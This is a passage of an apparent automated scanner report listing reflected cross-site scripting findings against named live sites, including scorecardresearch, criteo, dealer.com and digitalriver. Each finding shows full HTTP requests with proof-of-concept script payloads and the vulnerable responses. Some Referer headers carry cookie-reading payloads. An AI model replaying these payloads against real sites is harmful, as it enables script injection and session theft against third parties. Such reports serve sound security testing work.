Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:17 GMT
Date: Sat, 16 Apr 2011 13:51:17 GMT
Connection: close
Content-Length: 1253

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"", c6:"", c10:"b5161<script>alert(1)</script>029ad526e2b", c15:"", c16:"", r:""});
4.20. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 90e71<script>alert(1)</script>bdd122ed418 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c15=90e71<script>alert(1)</script>bdd122ed418 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:15 GMT
Date: Sat, 16 Apr 2011 13:51:15 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"", c6:"", c10:"", c15:"90e71<script>alert(1)</script>bdd122ed418", c16:"", r:""});
4.21. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 93f7e<script>alert(1)</script>4815f34f790 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=300569393f7e<script>alert(1)</script>4815f34f790&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:12 GMT
Date: Sat, 16 Apr 2011 13:51:12 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"300569393f7e<script>alert(1)</script>4815f34f790", c3:"3", c4:"http://alltop.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
4.22. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 28299<script>alert(1)</script>55b70b1e4ba was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=328299<script>alert(1)</script>55b70b1e4ba&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:12 GMT
Date: Sat, 16 Apr 2011 13:51:12 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"328299<script>alert(1)</script>55b70b1e4ba", c4:"http://alltop.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
4.23. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 908bc<script>alert(1)</script>b3a96683e20 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F908bc<script>alert(1)</script>b3a96683e20&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:13 GMT
Date: Sat, 16 Apr 2011 13:51:13 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
core;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/908bc<script>alert(1)</script>b3a96683e20", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.24. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 36087<script>alert(1)</script>c08dcabcf01 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=36087<script>alert(1)</script>c08dcabcf01&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:14 GMT
Date: Sat, 16 Apr 2011 13:51:14 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
r(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"36087<script>alert(1)</script>c08dcabcf01", c6:"", c10:"", c15:"", c16:"", r:""});



4.25. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 2bbdc<script>alert(1)</script>53129e2fbb3 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=2bbdc<script>alert(1)</script>53129e2fbb3&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:14 GMT
Date: Sat, 16 Apr 2011 13:51:14 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ength-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"", c6:"2bbdc<script>alert(1)</script>53129e2fbb3", c10:"", c15:"", c16:"", r:""});



4.26. http://cas.ny.us.criteo.com/delivery/afr.php [did parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cas.ny.us.criteo.com
Path:   /delivery/afr.php

Issue detail

The value of the did request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f81e5'style%3d'x%3aexpression(alert(1))'7563c489890 was submitted in the did parameter. This input was echoed as f81e5'style='x:expression(alert(1))'7563c489890 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /delivery/afr.php?zoneid=15066&bannerid=37112&did=156505f45df81e5'style%3d'x%3aexpression(alert(1))'7563c489890&rtb=5&z=Tar60gAHR30K5X_Nloo_2GL3qxoxX1hsFewpCw&b=_9%252f8RilNQuVmVpyvNO2WVQg%253d%253d&u=|QmCyCf/O7hL8fisSJvUOqKLBu3umSoU3sekQ5udTqrY=|&bi=|QmCyCf/O7hJlodhOLNsrwMA/kTEKxx+G6iE3+w8k9mtjbRxt/u2NAg==|&rl=~02-DC9C20D512FA751C4712D31356EF1781B34849CF-a-q-c-103--2-1-~&ep=%7cQmCyCf%2fO7hKYMkLPH4Veoi9%2bda57p3x3sVmFbD27DgeErQnbGjoFg9GtCrd0q81l%7c&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB5eg20vqqTf2OHc3_lQfY_6i0CaKBnoQCoqHByxOShdTVSQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MzE1NTc4NDYwMjUxNDIzoAGs3f7oA7IBEHd3dy5oYWJlci5nZW4udHK6AQozMDB4MjUwX2FzyAEJ2gFdaHR0cDovL3d3dy5oYWJlci5nZW4udHIvZWRpdGFjN2ZkJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoJTIySURJT1QlMjIpJTNDL3NjcmlwdCUzRTA1NTA0MTUzNzdimAL6FcACBcgCrMKrDqgDAfUDAAAAxIAGuoH4hfPs5YdV%26num%3D1%26sig%3DAGiWqtzGyfAoAR666KFrrSATBBfN92A9aw%26client%3Dca-pub-5315578460251423%26adurl%3D&prlog= HTTP/1.1
Host: cas.ny.us.criteo.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5315578460251423&format=300x250_as&output=html&h=250&w=300&lmt=1303068963&channel=2159340635&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fwww.haber.gen.tr%2Fincludes_yeni%2Fmynet3.htm&color_bg=FBFBFB&color_border=FFFFFF&color_link=45546B&color_text=000000&color_url=7CA415&flash=10.2.154&url=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert(%2522IDIOT%2522)%253C%2Fscript%253E0550415377b&dt=1303050963570&bpp=1&shv=r20110406&jsv=r20110412&prev_fmts=300x250_as&prev_slotnames=8756608441&correlator=1303050928025&frm=0&adk=3471477028&ga_vid=1891209206.1303050928&ga_sid=1303050928&ga_hid=1373877376&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=973&eid=33895132&ref=http%3A%2F%2Fburp%2Fshow%2F40&fu=0&ifi=3&dtd=161&xpc=f3SeV9FlEk&p=http%3A//www.haber.gen.tr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=ce48fc77-7599-4968-ae07-b1daf0463305; udc=*1PvotshjACjE74y20GwJvMA%3d%3d; udi=*15Fg%2b59W72YO0jpuTCiAJmQ%3d%3d; evt=*1YsJhcuZCSxoABQmXXWsOhR6uR3kIaBebvD6nwBJjjMY%3d; uic=*13H%2bAu%2bmG%2bChk8ggPbwnxkrQQ8Z17refXkYQu8eEU0fjeU%2fwLAHgNvhAiUG5QHNRj; dis=*12VWxXL1XaY1S9qvptFGQ7eAFRgw3i%2f%2bqtoIw3HzTj6ZMNuZlx6reINde4n7jPnAtZHWPtxCQPit16SZIkJNjGbu3LVUe3SUbdPsTn810eu5Eg1Rr1SF2zO9v%2bIakpFEkr%2bPx0gATCXaWun21B3PL5FeHd%2fxvSWhFldH0vbsgy%2fjKLco2gd2a5xR193L12noCPAD7a1A1WCUXWB5MnqCocdHz1zFhXaIYlFa%2feL8MeiewBP8i72W2Smo0B7dbOvaj4YQIwkmx%2bhWQJmM6a61%2f6P4XxxBbQzGrV4lLZk%2b0CXo8UaasIzysyNgVO5K%2fiDY29YyWJ%2ffsAElIhASNXkl7UXX6WTF11Uq9Y8kPvtt9giDoeJ%2bU90ABpHszulWVQwQ30hSjgW%2fh8kliCaB0pN58UTJ8qtpgQQmEc6kDASwS7xhIPYqdwcb%2fRd5FyC2pFqEy

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: private, max-age=0, no-cache
Content-Type: text/html; charset=utf-8
P3P: CP='CUR ADM OUR NOR STA NID'
Date: Sun, 17 Apr 2011 14:36:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: OAID=ce48fc7775994968ae07b1daf0463305; expires=Sun, 17-Apr-2016 14:36:10 GMT; path=/
Set-Cookie: udc=*13TYb407Nzn0ZH0Euz4UNtr9IsYUzbQITxUUULDLNmxZrzU%2fJ4gv%2fKlT6SKc05zuUvATSRvsw4b7TlyeQBoz1tuInb68k5ZYQ6P%2bZbSbdMTnMpG%2fUUAYABL%2fOjZdgNl%2fj1yYrlvJzVkyoSKgWFtCs4Dqpt7mJOo%2bqs5KBIyVS26c7WVJ1y6uhRTIzTLdaqwKgd6OY2P6jSrkZKY7xviAYiVuQbaKa3mvNqVmNBYtOh5wBJaP%2b2FWIxhj6mVOaLreP2ofbbEBmTXdBAofksnjZWg7eVzZOcKd%2b7sKZ4Lz8bKYP%2f3RTv3U2R3pumJE60%2bcg8ZdcXlBIGSJbKkjyIqjViftjM42kg1KotFLgmAlwmdXyxuOu4bd3QN92nCjulqUAdmotUPcIM7JdWjAC8mGD%2fCgK8XXhL4%2bdYF9kZnZw%2b0iSqbOhighXQzAcefoRjVZRlnkIUaGtVBaFMoR1r0lgyoDGgQzyRV%2b8Zs7N2l6KYNWfvAm3QPVWxio%2fzk2GdVdQ6qKA42XdYzPYY4iOYegdExE4%2bL0GiQKg%2bqbdrJufvWfj1xwnbX%2fMnTQmFyn3zUqhThDF9wGbiiDmWlXdZZYABw%3d%3d; domain=.criteo.com; expires=Mon, 17-Oct-2011 14:36:10 GMT; path=/
Set-Cookie: udi=*1kLYehFfAa6GMU2HG2byvAQ%3d%3d; domain=.criteo.com; expires=Mon, 18-Apr-2011 14:36:10 GMT; path=/
Set-Cookie: OACBLOCK=; expires=Tue, 17-May-2011 14:36:10 GMT; path=/
Set-Cookie: OACCAP=; expires=Tue, 17-May-2011 14:36:10 GMT; path=/
Set-Cookie: OASCCAP=; path=/
Content-Length: 6109

<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<div
...[SNIP]...
<iframe id='if156505f45df81e5'style='x:expression(alert(1))'7563c489890' name='if156505f45df81e5'style='x:expression(alert(1))'7563c489890' width='1px' height='1px'>
...[SNIP]...

4.27. https://cc.dealer.com/views/forgot-password [reseller parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cc.dealer.com
Path:   /views/forgot-password

Issue detail

The value of the reseller request parameter is copied into the HTML document as plain text between tags. The payload dd839<script>alert(1)</script>5d9f0f94bb2 was submitted in the reseller parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/forgot-password?reseller=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000145)%3C/script%3Edd839<script>alert(1)</script>5d9f0f94bb2&lang=en_US HTTP/1.1
Host: cc.dealer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; ssoid=6124c450404638d30061b29f82e6d54d; JSESSIONID=giphhm46cleri

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:29:56 GMT
Connection: keep-alive
Set-Cookie: ssoid=6370550540463812016995a2e0336b5c;path=/;domain=.dealer.com
Cache-Control: must-revalidate
Expires: Wed, 04 Dec 1996 21:29:02 GMT
Pragma: no-cache
Content-Length: 4059

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
   <title>Dealer.com Forgot Username/Password</title>

<style type="text/css">
   body{
       margin:0;
       padding:0;
       over
...[SNIP]...
</script>dd839<script>alert(1)</script>5d9f0f94bb2/login_graphic.png?0) no-repeat;
    width: 489px;
    height: 330px;
   }

   * html #loginBox{
       padding-top: 80px;
       padding-left: 0px;
   }

   #loginBox table {
       padding-left: 50px;
       padding-right: 65
...[SNIP]...

4.28. https://cc.dealer.com/views/forgot-password [reseller parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cc.dealer.com
Path:   /views/forgot-password

Issue detail

The value of the reseller request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 539c4"><script>alert(1)</script>aad2fd6705e was submitted in the reseller parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/forgot-password?reseller=539c4"><script>alert(1)</script>aad2fd6705e&lang=en_US HTTP/1.1
Host: cc.dealer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; ssoid=6124c450404638d30061b29f82e6d54d; JSESSIONID=giphhm46cleri

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:29:54 GMT
Connection: keep-alive
Set-Cookie: ssoid=63704c0b40463812016995a2a1a75473;path=/;domain=.dealer.com
Cache-Control: must-revalidate
Expires: Wed, 04 Dec 1996 21:29:02 GMT
Pragma: no-cache
Content-Length: 3955

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
   <title>Dealer.com Forgot Username/Password</title>

<style type="text/css">
   body{
       margin:0;
       padding:0;
       over
...[SNIP]...
<a href="/views/login?reseller=539c4"><script>alert(1)</script>aad2fd6705e" border="0">
...[SNIP]...

4.29. http://display.digitalriver.com/ [aid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84deb'-alert(1)-'cf4a7bdb388 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?aid=24484deb'-alert(1)-'cf4a7bdb388&tax=trend_micro HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://housecall.trendmicro.com/us/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:56:47 GMT
Server: Apache/2.2.9
Expires: Sun, 17 Apr 2011 13:26:47 GMT
Last-Modified: Sun, 17 Apr 2011 12:56:47 GMT
Content-Length: 234
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=24484deb'-alert(1)-'cf4a7bdb388&tax=trend_micro';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

4.30. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfcd5'-alert(1)-'d944e6c89e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?aid=244&tax=trend_micro&dfcd5'-alert(1)-'d944e6c89e=1 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://housecall.trendmicro.com/us/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:56:48 GMT
Server: Apache/2.2.9
Expires: Sun, 17 Apr 2011 13:26:48 GMT
Last-Modified: Sun, 17 Apr 2011 12:56:48 GMT
Content-Length: 236
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro&dfcd5'-alert(1)-'d944e6c89e=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

4.31. http://display.digitalriver.com/ [tax parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43d5f'-alert(1)-'d2ee4501071 was submitted in the tax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?aid=244&tax=trend_micro43d5f'-alert(1)-'d2ee4501071 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://housecall.trendmicro.com/us/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:56:48 GMT
Server: Apache/2.2.9
Expires: Sun, 17 Apr 2011 13:26:48 GMT
Last-Modified: Sun, 17 Apr 2011 12:56:48 GMT
Content-Length: 234
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro43d5f'-alert(1)-'d2ee4501071';
